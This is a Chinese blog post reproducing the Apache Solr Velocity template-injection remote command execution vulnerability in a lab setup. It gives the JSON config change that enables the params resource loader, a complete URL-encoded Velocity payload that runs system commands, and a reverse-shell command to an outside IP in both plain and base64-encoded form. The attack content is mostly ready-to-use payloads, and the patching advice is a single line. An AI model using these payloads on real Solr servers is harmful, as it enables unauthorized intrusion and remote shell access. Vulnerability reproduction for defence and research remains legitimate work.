模版报错_Apache Solr Velocity模版注入远程命令执行漏洞复线

最新推荐文章于 2024-04-02 19:27:21 发布
最新推荐文章于 2024-04-02 19:27:21 发布
阅读量207 收藏
点赞数
文章标签: 模版报错
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42468911/article/details/112717945
版权

0X01 漏洞概述

Apache Solr 是一个开源的搜索服务器。Solr使用Java语言开发,主要基于HTTP和ApacheLucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。

10月31日,安全研究员S00pY在GitHub发布了ApacheSolr Velocity模版注入远程命令执行的POC,经过其他安全团队和人员的验证和复线,此漏洞已经能够被批量利用。

0X02 环境搭建

方法一:下载源码

https://mirrors.tuna.tsinghua.edu.cn/apache/lucene/solr/

解压之后,不能直接启动,需要配置java环境变量,可参考之前的文章或者自行度娘。创建实例:

sudo ./solr create_core -c alice -d../example/example-DIH/solr/db –force

1b6e021003afbdcada50400d5bd1ee0c.png

然后,启动环境

5c3d0d562286efb617517d646b72005b.png

浏览器访问环境

http://172.16.1.137:8983/solr/#/

b12561c921b613f613318f0daea2818d.png

要获取相应的实例的路径,单击左侧的Core Admin即可知道相应的实例。

93316ee832753d198ec15c28dd7e3e7f.png

每个实例下都有相应的config配置信息,可以直接访问查看

http://172.16.1.137:8983/solr/alice/config

bc950c8d8a7e6f81b6b81e1888474ca5.png

访问config文件,Post提交以下数据:

{ "update-queryresponsewriter": {   "startup": "lazy",   "name": "velocity",   "class": "solr.VelocityResponseWriter",    "template.base.dir":"",   "solr.resource.loader.enabled": "true",   "params.resource.loader.enabled": "true"  }}

650648d30dafd8feccf89a1f1367f4f7.png

9f2006dbb038d417b25d16cdbe5fe850.png

f8ae883957029304bdf2fca7edd16656.png

这里要注意,数据格式一定要按照json发送,如果不对的话,很容易返回500或者400的bad request错误,如下:

70e0dd1494b036dbfd987374c5b991a2.png

0f82615a4563e6741ba256100e8bff47.png

所以,这里发包的时候,如果不正确,请多尝试几次。

方法二:通过docker搭建,可以直接search,方便省事的话,可以直接用vulhub上phith0n写好的docker拉取,方法按照如下链接步骤操作

https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193

这里不在赘述。完成之后还是像上面一样bp发送数据修改配置。这样环境搭建基本完成了。

0X03 漏洞利用

当solr默认插件VelocityResponseWrite中

params.resource.loader.enabled参数值为true(默认false),再通过精心构造的get请求即可RCE。如果存在solr未授权访问,可post直接修改params.resource.loader.enabled参数值为true。所以,在上一步我们经过post提交数据已经修改了这两项参数值,所以目前漏洞是可以触发的。

s00py给出了poc数据,链接如下:

https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt

adb11e0657719422c919f286f39a127b.png

访问链接,执行利用操作

http://172.16.1.137:8983/solr/alice/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

执行结果

82732eec95b2c694e5b8db74f9dee6ba.png

github上已经有很多研究人员放出漏洞利用脚本,如下等

https://github.com/theLSA/solr-rcehttps://github.com/Eth4nHunt/Apache-Solr-RCE

使用其中一个,即可获取cmdshell:

ab30467388afc1584842e5a3ad38ba75.png

在其他互联网环境的服务器上测试的时候,反弹shell很容易被分割中断,报错,命令如下:

bash -i >&/dev/tcp/45.32.2XX.XX/45670 >&1

但由于Runtime不能使用管道符等bash方法,所以需要进行编码

bash -c{echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzQ1LjMyLjIyMy4zMy80NTY3IDA+JjE=}|{base64,-d}|{bash,-i}

按照phith0n的解释:

0b2fa69120842cef62e5f7fd93dac55e.png

具体详情解释参考

https://zsxq.tricking.io/topic/501/

编码之后,我们再次测试,可以成功获取shell

dfa79f4ad003f2de3bcab2ee1ba8f7c5.png

0X04 加固修复

官网暂未发布相关漏洞补丁,及时关注官网更新。

http://lucene.apache.org/solr/downloads.html

0X05 参考链接

https://nosec.org/home/detail/3113.html

https://www.anquanke.com/post/id/190039

https://zsxq.tricking.io/topic/501/

https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt

https://github.com/shadow-horse/Apache-Solr-Velocity-RCE

9b5657e4760021918c66a9608473953c.png

cvebug@163.com

给我一片星空
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞预警】Apache Solr基于Velocity模板的远程命令执行漏洞
NOSEC2019的博客
10-31 1038
2019年10月末,白帽汇安全研究院发现网络上出现针对Apache Solr服务器的远程代码执行漏洞。该漏洞是由于Velocity模板存在注入所致(Velocity是一个基于Java的模板引擎,可让使用者通过模板语言引用Java中定义的对象)。攻击者在知道Solr服务器上Core名称后,先把params.resource.loader.enabled设置为true(就可加载指定资源),再进行远程...
Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)
weixin_44047654的博客
02-20 1029
Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)
Apache Solr Velocity模板注入远程命令执行漏洞
蚁景网安学院
11-01 495
0x00 前言今天在群里看到有人说GitHub上公布了一个关于solr的RCE漏洞,于是立马复现了一波!确定该poc是真实有效的。Solr是一个独立的企业级搜索应用服务器,它对外提供类似...
Java安全之Velocity模版注入
Huangjiazhen711的博客
09-22 1754
我们提供了五条基本的模板脚本语句,基本上就能满足所有应用模板的要求。Apache Velocity是一个基于Java的模板引擎,它提供了一个模板语言去引用由Java代码定义的对象。这是我们不希望的,为了把不存在的变量或变量值为null的对象显示为空白,则只需要在变量名前加一个“!如:在EasyJWeb各种开源应用中,我们经常看到的用于弹出提示信息msg的例子。在html标签中显示经过HtmlUtil对象处理过后的msg对象的值。,其中涉及到了ast的处理,感兴趣的师傅可以自己跟下看看。
Apache Solr Velocity模板注入RCE
吾所在处,即为净土
05-02 1309
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
apache-solr-1.4.0.zip_apache-solr _apache-solr-1.4.0_apache-solr
09-20
Apache Solr 是一个开源的企业级搜索平台,由Apache软件基金会开发。它基于Java,并且是Lucene库的一个高级封装,提供了更加便捷和可扩展的全文检索、数据分析和搜索功能。在1.4.0版本中,Solr已经相当成熟,为用户...
solr_exploit:Apache Solr远程代码执行突破(CVE-2019-0193)漏洞利用
03-10
声明 此处提供的漏洞检测方法,文件等内容,均仅限于安全从业者在获得法律授权的情况下使用,目的是检测已授权的服务器的安全性。...文档中只有一个item元素骑士实现只执行1次命令 也可以自己启动网络服务器托
solr_rce:通过Velocity模板的Apache Solr RCE
03-08
2019年10月30日,国外安全研究人员放出了一个关于solr模板注入的exp,攻击者通过未授权访问的solr服务器,发送特定的数据包打开params.resource.loader.enabled,然后获取访问接口导致服务器命令执行命令回显结果...
Apache Solr 代码执行漏洞应急响应通告
05-05
Apache Solr 代码执行漏洞应急响应通告
apache-solr-dataimportscheduler-1.0.zip_official54l_solr 5.x定时生成
09-24
Apache Solr是一个流行的开源搜索引擎,它提供全文搜索、命中高亮、拼写建议等功能,广泛应用于网站内容管理和企业级信息检索。在Solr 5.x版本中,为了实现数据的定时更新,用户需要借助特定的扩展来实现定时生成...
Apache Solr velocity模板注入RCE漏洞
m0_48520508的博客
07-27 588
0x01简介 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。 0x02漏洞介绍 Solr中存在VelocityResponseWriter组件,攻击者可以构造特定请求修改相关配置,使VelocityResponseWriter组件允许加载指定模板,进而导致Velocity模版注入远程命令执行漏洞,攻击者利用该漏
Apache Solr 模板注入远程命令执行
weixin_44508748的博客
12-14 287
fofa语法: FOFA:app="Solr" && country="CN" 该漏洞的产生是由于两方面的原因: 1.当攻击者可以直接访问Solr控制台时,可以通过发送类似/节点名/config的POST请求对该节点的配置文件做更改。 2.Apache Solr默认集成VelocityResponseWriter插件,在该插件的初始化参数中的params.resource.loader.enabled这个选项是用来控制是否允许参数资源加载器在Solr请求参数中指定模版,默认设置是fals
Apache Solr Velocity模板远程代码执行复现
Sylon的博客
10-31 1095
0x01漏洞描述 2019年10月31日,国外安全研究员s00py在Github公开了一个Apache Solr Velocity模板注入远程命令执行的poc。 经过研究,发现该0day漏洞真实有效并且可以攻击最新版本(8.2.0)的Solr。 0x02CVE编号 无 0x03漏洞等级 高危 0x04影响范围 包括但不限于8.2.0 0x05漏洞复现 1)首先 下载Solr的...
Solr Velocity模板远程代码执行漏洞复现
热门推荐
wo41ge的博客
02-11 1万+
下载 https://www.apache.org/dyn/closer.lua/lucene/solr/8.2.0/solr-8.2.0.zip 报错了 这边是需要手动添加的
Apache Solr Velocity 远程命令执行漏洞
潜心学安全的小白
10-31 507
目录漏洞背景漏洞成因影响版本漏洞复现获取core名称加载指定资源远程命令执行修复建议参考链接 漏洞背景 近日,国外安全研究员s00py公开了一个Apache SolrVelocity模板注入漏洞,可进行远程代码执行漏洞成因 Apache-Solr默认集成VelocityResponseWriter插件,该插件初始化参数中的 params.resource.loader.enabled 用来...
Apache Velocity漏洞CVE-2020-13936修复记录
qq_24380005的博客
04-07 8061
这里写自定义目录标题Apache Velocity漏洞CVE-2020-13936修复记录升级jar包即可一、velocity在1.7以后换名字了二、velocity2.3的升级需要jdk1.8附录 Apache Velocity漏洞CVE-2020-13936修复记录 最近由于某些懂得都懂的原因,我们在疯狂的修复漏洞,近期发现了一个Apache Velocity漏洞,声称如果Velocity版本在2.2及以下时,会有被通过模板攻击的危险。 升级jar包即可 有两个问题需要注意一下 一、velocity
【Java代码审计】模板注入漏洞
最新发布
大河之犬的博客
04-02 1014
模板注入是一种安全漏洞,发生在应用程序使用模板引擎时。模板引擎通常用于动态生成Web页面、邮件、报告等内容,它们允许开发人员在模板中插入变量、表达式或代码片段,并在生成输出时进行解析和执行。模板注入漏洞通常发生在模板引擎对用户提供的输入进行不充分或不正确的验证和过滤时,导致恶意用户能够注入恶意代码并执行它们。
Apache Solr velocity模板注入RCE漏洞复现
无心的博客
11-01 1129
目录 0x01 漏洞介绍0x02 漏洞范围0x03 漏洞复现 0x01 漏洞介绍 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于web-service的API接口。10月31号,国外安全研究院S00pY在GitHub发布了Apache Solr Velocity模板注入RCE的poc,截至写稿之时,Apache Solr官方还未发布该漏洞的补丁。 0x02 漏洞范围 Apache So...
Apache Solr Velocity模版注入远程命令执行漏洞
weixin_42372877的博客
11-01 550
0x01漏洞概述 2019年10月末,GitHub代码中安全研究员S00pY发布一个Apache Solr Velocity模版注入远程命令执行的POC,发现网络上出现针对Apache Solr服务器的远程代码执行漏洞。该漏洞是由于Velocity模板存在注入所致(Velocity是一个基于Java的模板引擎,可让使用者通过模板语言引用Java中定义的对象)。攻击者在知道Solr服务器上Core...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值